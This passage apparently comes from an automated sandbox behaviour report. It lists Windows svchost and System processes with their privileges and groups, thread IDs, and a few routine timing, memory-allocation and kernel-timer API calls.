os_tid = 0x9f8 Thread: id = 81 os_tid = 0x9f4 [0042.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x105dad0 | out: lpSystemTimeAsFileTime=0x105dad0*(dwLowDateTime=0x1161dbd0, dwHighDateTime=0x1d5a041)) [0042.527] GetCurrentProcessId () returned 0x9e4 [0042.527] GetCurrentThreadId () returned 0x9f4 [0042.527] GetTickCount () returned 0x1143acf [0042.527] QueryPerformanceCounter (in: lpPerformanceCount=0x105dad8 | out: lpPerformanceCount=0x105dad8*=16275723701) returned 1 [0042.527] malloc (_Size=0x100) returned 0x348e80 [0094.013] free (_Block=0x348e80) Thread: id = 82 os_tid = 0x9f0 Thread: id = 83 os_tid = 0x9ec Thread: id = 84 os_tid = 0x9e8 Thread: id = 85 os_tid = 0x9fc Thread: id = 86 os_tid = 0xa00 Thread: id = 87 os_tid = 0xa18 Thread: id = 94 os_tid = 0xa28 Thread: id = 189 os_tid = 0x96c Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4e677000" os_pid = "0xa04" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000500d0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 88 os_tid = 0xa20 Thread: id = 89 os_tid = 0xa1c Thread: id = 90 os_tid = 0xa14 Thread: id = 91 os_tid = 0xa10 Thread: id = 92 os_tid = 0xa0c Thread: id = 93 os_tid = 0xa08 Thread: id = 190 os_tid = 0x970 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 133 os_tid = 0xa98 Thread: id = 134 os_tid = 0x8f8 Thread: id = 135 os_tid = 0x408 Thread: id = 136 os_tid = 0x754 Thread: id = 137 os_tid = 0x704 Thread: id = 138 os_tid = 0x6e0 Thread: id = 139 os_tid = 0x6b0 Thread: id = 140 os_tid = 0x698 Thread: id = 141 os_tid = 0x678 Thread: id = 142 os_tid = 0x630 Thread: id = 143 os_tid = 0x610 Thread: id = 144 os_tid = 0x14c Thread: id = 145 os_tid = 0x140 Thread: id = 146 os_tid = 0x158 Thread: id = 147 os_tid = 0x294 Thread: id = 148 os_tid = 0x218 Thread: id = 149 os_tid = 0x21c Thread: id = 150 os_tid = 0x1c4 Thread: id = 186 os_tid = 0x93c Thread: id = 191 os_tid = 0xa24 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8bed000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba6f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 151 os_tid = 0x658 Thread: id = 152 os_tid = 0x584 Thread: id = 153 os_tid = 0x728 Thread: id = 154 os_tid = 0x674 Thread: id = 155 os_tid = 0x65c Thread: id = 156 os_tid = 0x144 Thread: id = 157 os_tid = 0x118 Thread: id = 158 os_tid = 0x3ec Thread: id = 159 os_tid = 0x3e0 Thread: id = 160 os_tid = 0x3dc Thread: id = 161 os_tid = 0x3cc Thread: id = 162 os_tid = 0x3c8 Thread: id = 163 os_tid = 0x388 Thread: id = 164 os_tid = 0x384 Thread: id = 165 os_tid = 0x380 Thread: id = 166 os_tid = 0x37c Thread: id = 167 os_tid = 0x364 Thread: id = 168 os_tid = 0x360 Thread: id = 169 os_tid = 0x34c Thread: id = 170 os_tid = 0x338 Thread: id = 184 os_tid = 0x94c Thread: id = 193 os_tid = 0xae4 Thread: id = 194 os_tid = 0xaf8 Process: id = "10" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 196 os_tid = 0x8 Thread: id = 197 os_tid = 0x3c Thread: id = 198 os_tid = 0xc4 Thread: id = 199 os_tid = 0xc8 Thread: id = 200 os_tid = 0x2c Thread: id = 201 os_tid = 0x50 Thread: id = 202 os_tid = 0x44 [0255.869] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1d1a9, Tag=0x616d6443) returned 0xfffffa8001993000 [0255.871] KeSetTimer (in: Timer=0xfffffa80018b46e4, DueTime=0xffffffffb49d58de, Dpc=0xfffffa80018b4724 | out: Timer=0xfffffa80018b46e4) returned 0 [0257.506] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1ce04, Tag=0x70764946) returned 0xfffffa80019b1000 [0257.507] KeSetTimer (in: Timer=0xfffffa80018b4d4d, DueTime=0xffffffffb41a4f28, Dpc=0xfffffa80018b4d8d | out: Timer=0xfffffa80018b4d4d) returned 0 Thread: id = 203 os_tid = 0x48 Thread: id = 204 os_tid = 0x94 Thread: id = 205 os_tid = 0x38 Thread: id = 206 os_tid = 0x40 Thread: id = 207 os_tid = 0xa0 Thread: id = 208 os_tid = 0xd0 Thread: id = 209 os_tid = 0xc Thread: id = 210 os_tid = 0xbc Thread: id = 211 os_tid = 0xd4 Thread: id = 212 os_tid = 0xd8 Thread: id = 213 os_tid = 0xdc Thread: id = 214 os_tid = 0xe8 Thread: id = 215 os_tid = 0xec Thread: id = 216 os_tid = 0x4c Thread: id = 217 os_tid = 0x68 Thread: id = 218 os_tid = 0x30 Thread: id = 219 os_tid = 0xfc Thread: id = 220 os_tid = 0x100 Thread: id = 221 os_tid = 0x104 Thread: id = 222 os_tid = 0x108 Thread: id = 223 os_tid = 0x10c Thread: id = 224 os_tid = 0x110 Thread: id = 225 os_tid = 0x60 Thread: id = 226 os_tid = 0x88 Thread: id = 227 os_tid = 0xb4 Thread: id = 228 os_tid = 0x128 Thread: id = 229 os_tid = 0x12c Thread: id = 230 os_tid = 0x130 Thread: id = 231 os_tid = 0x134 Thread: id = 232 os_tid = 0x138 Thread: id = 233 os_tid = 0x174 Thread: id = 234 os_tid = 0x84 Thread: id = 235 os_tid = 0x8c Thread: id = 236 os_tid = 0x90 Thread: id = 237 os_tid = 0x7c Thread: id = 238 os_tid = 0x9c Thread: id = 239 os_tid = 0x6c Thread: id = 240 os_tid = 0x78 Thread: id = 241 os_tid = 0x26c Thread: id = 242 os_tid = 0x2e4 Thread: id = 243 os_tid = 0x3b4 Thread: id = 244 os_tid = 0x28 Thread: id = 245 os_tid = 0x244 Thread: id = 246 os_tid = 0x98 Thread: id = 247 os_tid = 0x4d4 Thread: id = 248 os_tid = 0x588 Thread: id = 249 os_tid = 0x5e0 Thread: id = 250 os_tid = 0x5f0 Thread: id = 251 os_tid = 0x5f4 Thread: id = 252 os_tid = 0x63c Thread: id = 253 os_tid = 0x668 Thread: id = 254 os_tid = 0x678 Thread: id = 255 os_tid = 0x694 Thread: id = 256 os_tid = 0x6a8 Thread: id = 257 os_tid = 0x64 Thread: id = 258 os_tid = 0x24 Thread: id = 259 os_tid = 0x758 Thread: id = 260 os_tid = 0x20 Thread: id = 261 os_tid = 0x4dc Thread: id = 262 os_tid = 0x54 Thread: id = 263 os_tid = 0x4d8 Thread: id = 264 os_tid = 0x7ec Thread: id = 265 os_tid = 0x0 Thread: id = 266 os_tid = 0x470 Thread: id = 267 os_tid = 0x558 Thread: id = 268 os_tid = 0xa4 Thread: id = 269 os_tid = 0x31c Thread: id = 270 os_tid = 0x5bc Thread: id = 271 os_tid = 0x79c